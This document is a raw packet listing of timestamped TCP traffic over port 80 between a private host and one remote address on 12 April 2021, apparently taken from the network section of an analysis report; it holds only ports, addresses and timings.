Apr 12, 2021 08:02:45.500991106 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501003981 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501019001 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501036882 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501041889 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501061916 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501065969 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501086950 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501091003 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501106024 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501112938 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501133919 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501135111 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501158953 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501162052 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501185894 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501194000 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501209021 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501209974 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501225948 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501233101 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501247883 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501261950 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501280069 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501301050 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501307011 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501326084 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501332045 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501332998 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501344919 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501357079 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501362085 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501399994 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501400948 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501426935 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501441956 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501449108 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501463890 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501471043 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501482010 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501492977 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501502037 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501518011 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501537085 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501543045 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501553059 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501568079 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501585007 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501590014 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501601934 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501614094 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501619101 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501636982 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501657963 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501657963 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501681089 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501686096 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501693010 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501704931 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501719952 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501729965 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501739979 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501755953 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501776934 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501776934 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501796007 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501801968 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501813889 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501826048 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501835108 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501848936 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501864910 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501871109 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501884937 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501893044 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501899958 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501918077 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501935005 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501940966 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501952887 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501962900 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.501971006 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.501986027 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.502002954 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.502007961 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.502022028 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.502031088 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.502048016 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.502070904 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.502074003 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.502093077 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.502096891 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.502100945 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.502118111 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.502137899 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.511996984 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512032032 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512054920 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512078047 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512099028 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512120008 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512144089 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512161016 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512172937 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512190104 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512193918 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512197971 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512202978 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512218952 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512221098 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512223005 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512243986 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512243986 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512248993 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512267113 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512267113 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512273073 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512281895 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512290955 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512300968 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512314081 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512334108 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512347937 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512814045 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512841940 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512867928 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512893915 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512917042 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512917042 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512929916 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512933016 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512939930 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512943029 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512967110 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512969971 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.512989044 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.512999058 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513015032 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513025999 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513041973 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513048887 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513063908 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513072014 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513093948 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513096094 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513118029 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513119936 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513139963 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513147116 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513164997 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513169050 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513185978 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513191938 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513210058 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513220072 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513241053 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513245106 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513266087 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513272047 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513283968 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513297081 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513318062 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513319016 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513339043 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513343096 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513355970 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513367891 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513372898 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513411045 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513415098 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513441086 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513459921 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513462067 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513482094 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513484955 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513504982 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513510942 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513520002 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513535023 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513554096 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513556957 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513571978 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513580084 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513601065 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513602018 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513622046 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513623953 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513643980 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513644934 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.513658047 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.513675928 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665338039 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665405989 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665432930 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665457010 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665457964 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665483952 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665493011 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665498018 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665501118 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665512085 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665524960 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665537119 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665549994 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665561914 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665572882 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665585995 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665596008 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665612936 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665628910 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665636063 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665659904 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665669918 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665685892 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665685892 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665704012 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665719032 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665720940 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665743113 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665755987 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665767908 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665771961 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665792942 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665802002 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665819883 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665827990 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665844917 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665854931 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665868998 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665880919 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665896893 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665900946 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665924072 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665932894 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665949106 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665958881 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665972948 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665982962 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.665997028 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.665999889 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666022062 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666035891 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666048050 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666050911 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666073084 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666083097 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666100025 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666100025 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666129112 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666136026 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666152954 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666165113 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666181087 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666224003 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666249037 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666270018 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666290998 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666294098 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666321993 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666336060 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666347980 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666356087 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666371107 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666384935 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666399002 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666402102 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666424036 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666434050 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666450024 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666462898 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666475058 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666497946 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666497946 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666516066 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666524887 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666532993 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666552067 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666559935 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666577101 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666588068 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666599989 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666604996 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666624069 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666635036 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666646957 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666651964 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666671991 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666696072 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666708946 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666733027 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666733027 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666747093 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666758060 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666765928 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666778088 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666795015 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666804075 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666814089 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666842937 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666852951 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666891098 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666898012 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666934013 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666940928 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666964054 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666977882 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.666985035 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.666994095 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.667145014 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.667896986 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.819880962 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.819996119 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.828252077 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.828278065 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.828289986 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.828397989 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.828437090 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.828440905 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830086946 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830115080 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830133915 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830178022 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830209970 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830215931 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830230951 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830255032 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830276012 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830276966 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830296040 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830296993 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830316067 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830332994 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830528975 CEST	80	49167	13.235.115.155	192.168.2.22
